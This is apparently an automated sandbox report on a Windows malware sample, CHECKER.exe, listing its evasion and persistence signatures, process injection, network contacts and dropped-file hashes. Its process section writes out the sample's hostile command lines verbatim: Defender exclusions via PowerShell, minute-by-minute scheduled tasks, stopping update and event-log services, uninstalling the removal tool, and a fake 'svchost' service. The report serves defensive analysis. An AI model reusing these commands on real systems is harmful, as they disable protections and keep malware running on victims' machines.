Malware Analysis Report

2025-03-14 22:29

Sample ID 240407-23qxaahd66
Target CHECKER.exe
SHA256 38fcbc520ffdd2c818cc0a0cc662db028994647603c5ede66ddb16aa5879ec6c
Tags
evasion persistence
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

38fcbc520ffdd2c818cc0a0cc662db028994647603c5ede66ddb16aa5879ec6c

Threat Level: Likely malicious

The file CHECKER.exe was found to be: Likely malicious.

Malicious Activity Summary

evasion persistence

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Creates new service(s)

Stops running service(s)

Looks for VMWare Tools registry key

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 23:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 23:06

Reported

2024-04-07 23:09

Platform

win10-20240404-en

Max time kernel

150s

Max time network

143s

Command Line

winlogon.exe

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeChecker = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CHECKER.exe" C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\EdgeUpdater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\audiodg.exe" C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx c:\windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4516 set thread context of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4448 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4448 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4448 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4448 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Users\Admin\AppData\Local\Temp\audiodg.exe
PID 4448 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Users\Admin\AppData\Local\Temp\audiodg.exe
PID 4448 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 4448 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\CHECKER.exe C:\Windows\SysWOW64\schtasks.exe
PID 3316 wrote to memory of 4204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 3316 wrote to memory of 4204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 4516 wrote to memory of 484 N/A C:\Users\Admin\AppData\Local\Temp\audiodg.exe C:\Windows\system32\dialer.exe
PID 484 wrote to memory of 580 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 484 wrote to memory of 640 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 740 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 900 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 1016 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 352 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 692 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 484 wrote to memory of 892 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1068 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1096 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1164 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1208 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 484 wrote to memory of 1252 N/A C:\Windows\system32\dialer.exe c:\windows\system32\svchost.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 640 wrote to memory of 2728 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Users\Admin\AppData\Local\Temp\CHECKER.exe

"C:\Users\Admin\AppData\Local\Temp\CHECKER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CHECKER.exe'"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCore{5GC93CA01-CJ51-H34A-F4K1-EC0217BD138C}" /TR "C:\Users\Admin\AppData\Local\Temp\CHECKER.exe" /RL HIGHEST /F

C:\Users\Admin\AppData\Local\Temp\audiodg.exe

C:\Users\Admin\AppData\Local\Temp\audiodg.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCore{3FD61DA67-EE83-4DEC-A42C-EC0217BD120C}" /TR "C:\Users\Admin\AppData\Local\Temp\audiodg.exe" /RL HIGHEST /F

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "svchost"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "svchost" binpath= "C:\ProgramData\RunDLL\taskhostw.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "svchost"

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

memory/4448-0-0x0000000000800000-0x0000000000801000-memory.dmp

memory/4448-2-0x0000000000910000-0x0000000001819000-memory.dmp

memory/4448-1-0x0000000000910000-0x0000000001819000-memory.dmp

memory/2296-5-0x0000000006B20000-0x0000000006B56000-memory.dmp

memory/2296-6-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/2296-7-0x0000000003020000-0x0000000003030000-memory.dmp

memory/2296-8-0x0000000003020000-0x0000000003030000-memory.dmp

memory/2296-9-0x0000000007190000-0x00000000077B8000-memory.dmp

memory/2296-10-0x0000000007840000-0x0000000007862000-memory.dmp

memory/2296-11-0x00000000079C0000-0x0000000007A26000-memory.dmp

memory/2296-12-0x00000000078E0000-0x0000000007946000-memory.dmp

memory/2296-13-0x0000000007BD0000-0x0000000007F20000-memory.dmp

memory/2296-14-0x0000000007B40000-0x0000000007B5C000-memory.dmp

memory/2296-15-0x0000000008430000-0x000000000847B000-memory.dmp

memory/2296-16-0x0000000008230000-0x00000000082A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wunhuih.utp.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2296-33-0x0000000009390000-0x00000000093C3000-memory.dmp

memory/2296-34-0x0000000070720000-0x000000007076B000-memory.dmp

memory/2296-36-0x0000000009370000-0x000000000938E000-memory.dmp

memory/4448-35-0x0000000000910000-0x0000000001819000-memory.dmp

memory/2296-41-0x000000007E180000-0x000000007E190000-memory.dmp

memory/2296-42-0x00000000094D0000-0x0000000009575000-memory.dmp

memory/2296-43-0x0000000003020000-0x0000000003030000-memory.dmp

memory/2296-44-0x0000000009690000-0x0000000009724000-memory.dmp

memory/2296-237-0x0000000009640000-0x000000000965A000-memory.dmp

memory/2296-242-0x0000000009630000-0x0000000009638000-memory.dmp

memory/2296-258-0x0000000073B40000-0x000000007422E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\audiodg.exe

MD5 047ece692744926c57a5cf74ec892b2a
SHA1 33c2fb7f524056a12f75bd07854818650ce351a3
SHA256 2b46c5609e8aede8c919b9b5d80ac7dadddb288eb7a8ee49a1e8bda0958c81a7
SHA512 31f4a8f66d299f858a41b0e9ba8d8539af8e65c30975b66212f3d57b45432b23bd868f4b75b74e7f679c4a0cdf5d728a96a10efe8f605097ec4e16433d385a41

memory/588-286-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

memory/588-285-0x0000016F77FE0000-0x0000016F78002000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6e00909a940924dcb736787715d1e55
SHA1 f6b640080777d173cea6c2d5eed9c2138cac24d1
SHA256 a00e099601428a75e958f111b61a739c3ca6c6a89919a416a4a6a6a07734f9f8
SHA512 b97d0014a336baca090a2c23e52ecd4b4d87bad9d20a29ea95d6400eef963a82db6ab8b0c1b407368cf25fb84c7e4312d02b3423600b58b11f6965c81095a416

memory/588-287-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp

memory/588-288-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp

memory/588-291-0x0000016F78190000-0x0000016F78206000-memory.dmp

memory/588-304-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp

memory/588-326-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp

memory/588-331-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp

memory/484-332-0x0000000140000000-0x000000014002B000-memory.dmp

memory/484-333-0x0000000140000000-0x000000014002B000-memory.dmp

memory/484-335-0x0000000140000000-0x000000014002B000-memory.dmp

memory/484-334-0x0000000140000000-0x000000014002B000-memory.dmp

memory/484-337-0x0000000140000000-0x000000014002B000-memory.dmp

memory/484-339-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/484-341-0x00007FFAA75B0000-0x00007FFAA765E000-memory.dmp

memory/484-342-0x0000000140000000-0x000000014002B000-memory.dmp

memory/580-345-0x0000018AE20A0000-0x0000018AE20C4000-memory.dmp

memory/640-348-0x000001AC41640000-0x000001AC4166B000-memory.dmp

memory/580-347-0x0000018AE20D0000-0x0000018AE20FB000-memory.dmp

memory/640-349-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/580-350-0x00007FFAA9915000-0x00007FFAA9916000-memory.dmp

memory/640-353-0x00007FFAA9915000-0x00007FFAA9916000-memory.dmp

memory/640-352-0x000001AC41640000-0x000001AC4166B000-memory.dmp

memory/740-357-0x000001AA35800000-0x000001AA3582B000-memory.dmp

memory/740-358-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/1016-361-0x0000017CCE400000-0x0000017CCE42B000-memory.dmp

memory/900-369-0x00000127A3960000-0x00000127A398B000-memory.dmp

memory/352-370-0x000001578E020000-0x000001578E04B000-memory.dmp

memory/4448-376-0x0000000000910000-0x0000000001819000-memory.dmp

memory/352-375-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/900-367-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/1016-365-0x00007FFAA9915000-0x00007FFAA9916000-memory.dmp

memory/900-364-0x00000127A3960000-0x00000127A398B000-memory.dmp

memory/692-377-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/1068-386-0x000001A57AD60000-0x000001A57AD8B000-memory.dmp

memory/892-380-0x00000268B60C0000-0x00000268B60EB000-memory.dmp

memory/692-374-0x0000022CF2E30000-0x0000022CF2E5B000-memory.dmp

memory/892-383-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/352-392-0x000001578E020000-0x000001578E04B000-memory.dmp

memory/1096-393-0x000001FE6C0F0000-0x000001FE6C11B000-memory.dmp

memory/484-397-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/1164-395-0x000001A6A46B0000-0x000001A6A46DB000-memory.dmp

memory/1068-390-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/580-389-0x0000018AE20D0000-0x0000018AE20FB000-memory.dmp

memory/1016-399-0x0000017CCE400000-0x0000017CCE42B000-memory.dmp

memory/1096-401-0x00007FFA69900000-0x00007FFA69910000-memory.dmp

memory/1164-408-0x000001A6A46B0000-0x000001A6A46DB000-memory.dmp

